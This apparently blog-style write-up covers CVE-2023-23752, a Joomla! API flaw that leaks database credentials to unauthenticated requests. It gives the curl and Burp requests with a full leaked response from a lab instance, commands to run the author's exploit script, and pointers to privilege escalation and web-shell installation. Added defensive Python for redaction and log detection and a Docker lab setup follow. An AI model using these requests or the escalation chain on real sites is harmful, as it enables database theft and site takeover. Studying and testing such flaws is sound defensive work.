CVE-2023-23752 Joomla! | Improper unauthorized file access

Luís Felipe
2 min read · Jul 25, 2023


Affected versions: 4.0.0 to 4.2.7

Score: 5.3 (MEDIUM)

For more information on the fix, see the Joomla! security advisory: https://developer.joomla.org/security-centre/894-20230201-core-improper-access-check-in-webservice-endpoints.html

Example:

root@server:/# curl http://localhost:8080/api/index.php/v1/config/application?public=true

{"links":{"self":"http://localhost:8080/api/index.php/v1/config/application?public=true","next":"http://localhost:8080/api/index.php/v1/config/applicationpublic=true&page%5Boffset%5D=20&page%5Blimit%5D=20","last":"http://localhost:8080/api/index.php/v1/config/application?public=true&page%5Boffset%5D=60&page%5Blimit%5D=20"},"data":[{"type":"application","id":"224","attributes":{"offline":false,"id":224}},{"type":"application","id":"224","attributes":{"offline_message":"Este site est\u00e1 fora do ar para manuten\u00e7\u00e3o.
Por favor, verifique novamente em breve.","id":224}},{"type":"application","id":"224","attributes":{"display_offline_message":1,"id":224}},{"type":"application","id":"224","attributes":{"offline_image":"","id":224}},{"type":"application","id":"224","attributes":{"sitename":"CVEpedia","id":224}},{"type":"application","id":"224","attributes":{"editor":"tinymce","id":224}},{"type":"application","id":"224","attributes":{"captcha":"0","id":224}},{"type":"application","id":"224","attributes":{"list_limit":20,"id":224}},{"type":"application","id":"224","attributes":{"access":1,"id":224}},{"type":"application","id":"224","attributes":{"debug":false,"id":224}},{"type":"application","id":"224","attributes":{"debug_lang":false,"id":224}},{"type":"application","id":"224","attributes":{"debug_lang_const":true,"id":224}},{"type":"application","id":"224","attributes":{"dbtype":"mysqli","id":224}},{"type":"application","id":"224","attributes":{"host":"joomladb","id":224}},{"type":"application","id":"224","attributes":{"user":"root","id":224}},{"type":"application","id":"224","attributes":{"password":"123pass123","id":224}},{"type":"application","id":"224","attributes":{"db":"joomla_db","id":224}},{"type":"application","id":"224","attributes":{"dbprefix":"f4jpq_","id":224}},{"type":"application","id":"224","attributes":{"dbencryption":0,"id":224}},{"type":"application","id":"224","attributes":{"dbsslverifyservercert":false,"id":224}}],"meta":{"total-pages":4}}

The Flaw

The flaw is an improper access check on this endpoint: with public=true in the query string, an unauthenticated request returns the application configuration, including the database credentials in clear text.

The vulnerable URL:

http://<IP_VICTIM>:8080/api/index.php/v1/config/application?public=true

Request in Burp

GET /api/index.php/v1/config/application?public=true HTTP/1.1
Host: localhost:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

In curl

curl http://localhost:8080/api/index.php/v1/config/application?public=true
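When checking one of your own instances, the response shown at the top of this post is awkward to read and unsafe to paste into a ticket as-is. The following is an added example (my own code, not from the post or from the CVEpedia repository): it parses the JSON:API shape the endpoint returns, one "application" object per configuration attribute, merges the attributes into a single dict, lists which database-credential keys are present, and produces a redacted copy for reporting. The sample response is constructed from the fields shown above.

```python
import json

# Constructed sample: a trimmed copy of the response shape shown in the post
# (one "application" object per attribute, all carrying the same id).
SAMPLE_RESPONSE = json.dumps({
    "links": {"self": "http://localhost:8080/api/index.php/v1/config/application?public=true"},
    "data": [
        {"type": "application", "id": "224", "attributes": {"sitename": "CVEpedia", "id": 224}},
        {"type": "application", "id": "224", "attributes": {"dbtype": "mysqli", "id": 224}},
        {"type": "application", "id": "224", "attributes": {"host": "joomladb", "id": 224}},
        {"type": "application", "id": "224", "attributes": {"user": "root", "id": 224}},
        {"type": "application", "id": "224", "attributes": {"password": "123pass123", "id": 224}},
        {"type": "application", "id": "224", "attributes": {"db": "joomla_db", "id": 224}},
        {"type": "application", "id": "224", "attributes": {"dbprefix": "f4jpq_", "id": 224}},
    ],
    "meta": {"total-pages": 1},
})

# Database connection details that must never be readable without authentication.
SENSITIVE_KEYS = {"host", "user", "password", "db", "dbprefix"}


def flatten_config(body: str) -> dict:
    """Merge the one-attribute-per-object list into a single config dict."""
    doc = json.loads(body)
    merged = {}
    for item in doc.get("data", []):
        if item.get("type") != "application":
            continue
        for key, value in item.get("attributes", {}).items():
            if key != "id":          # the repeated object id is not a setting
                merged[key] = value
    return merged


def exposed_sensitive_keys(body: str) -> list:
    """Sorted names of sensitive attributes present in an unauthenticated response."""
    return sorted(k for k in flatten_config(body) if k in SENSITIVE_KEYS)


def redacted_report(body: str) -> dict:
    """Copy of the merged config with sensitive values masked, safe to attach to a ticket."""
    return {k: ("<redacted>" if k in SENSITIVE_KEYS else v)
            for k, v in flatten_config(body).items()}


if __name__ == "__main__":
    leaked = exposed_sensitive_keys(SAMPLE_RESPONSE)
    if leaked:
        print("VULNERABLE: unauthenticated response exposes", ", ".join(leaked))
    else:
        print("No database credentials in response")
    print(json.dumps(redacted_report(SAMPLE_RESPONSE), indent=2))
```

Feed it the body of the unauthenticated GET instead of the constructed sample; an empty `exposed_sensitive_keys` result on a response from your own server is the check you want after patching.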

Exploit

git clone https://github.com/luisfelipesec/CVEpedia.git
cd CVEpedia/CVE-2023-23752
chmod +x CVE-2023-23752.sh
./CVE-2023-23752.sh localhost 8080

With the credentials obtained, it is possible to connect to the MySQL database, read the super user's name and/or change the password.

Privilege Escalation

Either by brute-forcing the Super User account or by changing its password through MySQL: https://vulncheck.com/blog/joomla-for-rce

Installing a web shell via a plugin

https://github.com/p0dalirius/Joomla-webshell-plugin
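On the defensive side, the request shown in the Burp and curl sections is easy to spot in web server access logs. This is an added example, not code from the post: a small Python detector over constructed Apache combined-format log lines. It URL-decodes the request target before inspecting it, so percent-encoded variants of the query string are caught as well, and it records whether the server answered 200 (the bypass worked) or an error status. The log lines, IPs and user agents are made up for the example.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Apache combined-format log lines; addresses, timestamps and
# user agents are invented for this example.
SAMPLE_LOG = """\
203.0.113.10 - - [25/Jul/2023:10:15:01 +0000] "GET /index.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.10 - - [25/Jul/2023:10:15:07 +0000] "GET /api/index.php/v1/config/application?public=true HTTP/1.1" 200 2890 "-" "curl/7.88.1"
198.51.100.7 - - [25/Jul/2023:10:16:22 +0000] "GET /api/index.php/v1/config/application?public=true&page%5Boffset%5D=20 HTTP/1.1" 200 2711 "-" "Mozilla/5.0"
198.51.100.7 - - [25/Jul/2023:10:17:03 +0000] "GET /api/index.php/v1/config/application%3Fpublic%3Dtrue HTTP/1.1" 403 199 "-" "Mozilla/5.0"
192.0.2.44 - - [25/Jul/2023:10:18:40 +0000] "GET /api/index.php/v1/config/application HTTP/1.1" 401 88 "-" "Mozilla/5.0"
"""

# Combined log format: ip ident user [time] "method target proto" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"'
)

# The endpoint from the write-up above.
WATCHED_PATH = "/api/index.php/v1/config/application"


def parse_line(line: str):
    """Split one access-log line into its fields, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def is_config_leak_request(target: str) -> bool:
    """True when the request target hits the config endpoint with public=true."""
    # Decode first so that an encoded '?' or '=' cannot hide the query string.
    # (This also decodes '&' inside values, which is acceptable for detection.)
    parts = urlsplit(unquote(target))
    if not parts.path.startswith(WATCHED_PATH):
        return False
    query = parse_qs(parts.query, keep_blank_values=True)
    return any(v.lower() == "true" for v in query.get("public", []))


def find_exploit_attempts(log_text: str) -> list:
    """Return parsed records for every matching request, flagging 200 responses."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and is_config_leak_request(rec["target"]):
            rec["succeeded"] = rec["status"] == "200"
            hits.append(rec)
    return hits


def attempts_by_ip(log_text: str) -> dict:
    """Count matching requests per source address for quick triage."""
    return dict(Counter(h["ip"] for h in find_exploit_attempts(log_text)))


if __name__ == "__main__":
    for h in find_exploit_attempts(SAMPLE_LOG):
        state = "SUCCEEDED" if h["succeeded"] else "blocked"
        print(f'{h["ts"]} {h["ip"]} {h["status"]} {state}: {h["target"]}')
    print(attempts_by_ip(SAMPLE_LOG))
```

A 200 on this request from an unauthenticated client means the instance was still on an affected version at that time and the credentials in the response should be treated as compromised and rotated; according to the Joomla! advisory linked above, the fix is to upgrade to 4.2.8.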

Tips:

Creating a test environment with Docker

Using a docker-compose.yml file:

version: '3.1'

services:
  joomla:
    image: joomla:4.2.7-php8.1-apache
    restart: always
    links:
      - joomladb:mysql
    ports:
      - 8080:80
    environment:
      JOOMLA_DB_HOST: joomladb
      JOOMLA_DB_PASSWORD: 123pass123

  joomladb:
    image: mysql:5.6
    restart: always
    environment:
      MYSQL_ROOT_PASSWORD: 123pass123

With the containers running, the vulnerable URL to test against is:

http://<IP_VICTIM>:8080/api/index.php/v1/config/application?public=true
